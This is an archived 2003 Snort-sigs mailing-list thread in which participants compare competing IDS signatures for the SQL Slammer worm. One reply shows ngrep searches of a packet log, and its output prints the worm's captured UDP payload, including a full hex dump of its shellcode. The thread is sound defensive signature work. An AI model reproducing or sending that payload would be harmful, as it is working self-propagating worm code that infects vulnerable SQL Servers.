[Snort-sigs] SQL Slammer Worm Signature

Discussion:

M***@Asia.ING.com

2003-02-10 07:20:13 UTC

Someone formerly posted the rule for capturing SQL slammer as:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)

which differs from the one found in snort.org (snortrules-current.tar.gz):

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)

Others suggest this rule:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

How come there are so many versions ? Though the header part is identical,
the 'meat' is totally different !

Thanks,
Michael

-----------------------------------------------------------------------------
Email Address Change Notice:

Please note that my email address has changed to "***@asia.ing.com".

-----------------------------------------------------------------------------
The information in this Internet email is confidential and may be legally
privileged. It is intended solely for the addressee. Access to this Internet
email by anyone else is unauthorised.

If you are not the intended recipient, any disclosure, copying, distribution
or any action taken or omitted to be taken in reliance on it, is prohibited
and may be unlawful. When addressed to our clients any opinions or advice
contained in this Internet email are subject to the terms and conditions
expressed in any applicable governing ING's terms of business or
client engagement letter.

Visit us at www.ing.com
-----------------------------------------------------------------------------

John Sage

2003-02-10 17:06:04 UTC

Permalink

Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
How come there are so many versions ? Though the header part is identical,
the 'meat' is totally different !
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)

A hex search of packet content:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x0401010101010101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x0401010101010101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
.....................................................................................
...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....
#
<snip>
exit

Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)

Another hex search:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x81F10301049B81F101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x81F10301049B81F101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
.....................................................................................
...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....
#
<snip>
exit

Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

--
"You are in a little maze of twisty passages, all different."

PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800 4EF6 5FC8 F23D 35A4 F705

M***@Asia.ING.com

2003-02-11 00:09:05 UTC

Permalink

Thanks for your detailed reply. I am now clear from your 'ngrep' output that
different analysts tend to extract different part of the worm for building
signature. I am just wondering the first one with content equals to "04 01
01 01 01 01 01 01", will that be too general to judge from this pattern that
it is the SQL slammer worm ? Does that mean no other worms will adopt this
pattern ? In fact, I would like to know which part of the worm should I
extract for building snort signature ?

Thanks & regards,
Michael

-----Original Message-----
From: John Sage [mailto:***@finchhaven.com]
Sent: Tuesday, February 11, 2003 3:02 AM
To: Advani, Michael
Cc: snort-***@lists.sourceforge.net
Subject: Re: [Snort-sigs] SQL Slammer Worm Signature

propagation

Post by M***@Asia.ING.com
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
How come there are so many versions ? Though the header part is identical,
the 'meat' is totally different !
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)

A hex search of packet content:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x0401010101010101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x0401010101010101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434

............................................................................
.........

...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32
hkernQhou

nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B.
...=U..Qt

.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...
........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....

#
<snip>
exit

Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm

propagation

Another hex search:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x81F10301049B81F101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x81F10301049B81F101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434

............................................................................
.........

...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32
hkernQhou

nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B.
...=U..Qt

.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...
........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....

#
<snip>
exit

Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

Note that this queries for ASCII content, not hex..

[***@sparky /storage/snort/old_snorts/013003]# ngrep -ext -I
snort-0130\@1918.log "dllhel32hkernQhounthickChGetTf" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: dllhel32hkernQhounthickChGetTf
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 dc c9 b0 42 eb 0e 01 01 01 01 01 01 01 70 ae ....B.........p.
42 01 70 ae 42 90 90 90 90 90 90 90 90 68 dc c9 B.p.B........h..
b0 42 b8 01 01 01 01 31 c9 b1 18 50 e2 fd 35 01 .B.....1...P..5.
01 01 05 50 89 e5 51 68 2e 64 6c 6c 68 65 6c 33 ...P..Qh.dllhel3
32 68 6b 65 72 6e 51 68 6f 75 6e 74 68 69 63 6b 2hkernQhounthick
43 68 47 65 74 54 66 b9 6c 6c 51 68 33 32 2e 64 ChGetTf.llQh32.d
68 77 73 32 5f 66 b9 65 74 51 68 73 6f 63 6b 66 hws2_f.etQhsockf
b9 74 6f 51 68 73 65 6e 64 be 18 10 ae 42 8d 45 .toQhsend....B.E
d4 50 ff 16 50 8d 45 e0 50 8d 45 f0 50 ff 16 50 .P..P.E.P.E.P..P
be 10 10 ae 42 8b 1e 8b 03 3d 55 8b ec 51 74 05 ....B....=U..Qt.
be 1c 10 ae 42 ff 16 ff d0 31 c9 51 51 50 81 f1 ....B....1.QQP..
03 01 04 9b 81 f1 01 01 01 01 51 8d 45 cc 50 8b ..........Q.E.P.
45 c0 50 ff 16 6a 11 6a 02 6a 02 ff d0 50 8d 45 E.P..j.j.j...P.E
c4 50 8b 45 c0 50 ff 16 89 c6 09 db 81 f3 3c 61 .P.E.P........<a
d9 ff 8b 45 b4 8d 0c 40 8d 14 88 c1 e2 04 01 c2 ***@........
c1 e2 08 29 c2 8d 04 90 01 d8 89 45 b4 6a 10 8d ...).......E.j..
45 b0 50 31 c9 51 66 81 f1 78 01 51 8d 45 03 50 E.P1.Qf..x.Q.E.P
8b 45 ac 50 ff d6 eb ca .E.P....
#
<snip>

- John
--
"You are in a little maze of twisty passages, all different."

PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800 4EF6 5FC8 F23D 35A4 F705

-----------------------------------------------------------------------------
The information in this Internet email is confidential and may be legally
privileged. It is intended solely for the addressee. Access to this Internet
email by anyone else is unauthorised.

If you are not the intended recipient, any disclosure, copying, distribution
or any action taken or omitted to be taken in reliance on it, is prohibited
and may be unlawful. When addressed to our clients any opinions or advice
contained in this Internet email are subject to the terms and conditions
expressed in any applicable governing ING's terms of business or
client engagement letter.

Visit us at www.ing.com
-----------------------------------------------------------------------------

Continue reading on narkive:

Search results for '[Snort-sigs] SQL Slammer Worm Signature' (Questions and Answers)

replies

what is internet love ?

started 2006-02-11 18:44:19 UTC

family & relationships

replies

Is my firewall protecting me?

started 2010-01-23 01:03:44 UTC

security

replies

Hi friends,is there anybody who can give me a speech on internet?

started 2006-11-13 05:35:39 UTC

internet

replies

What other computer viruses are there besides Malware?

started 2010-12-30 01:50:29 UTC

desktops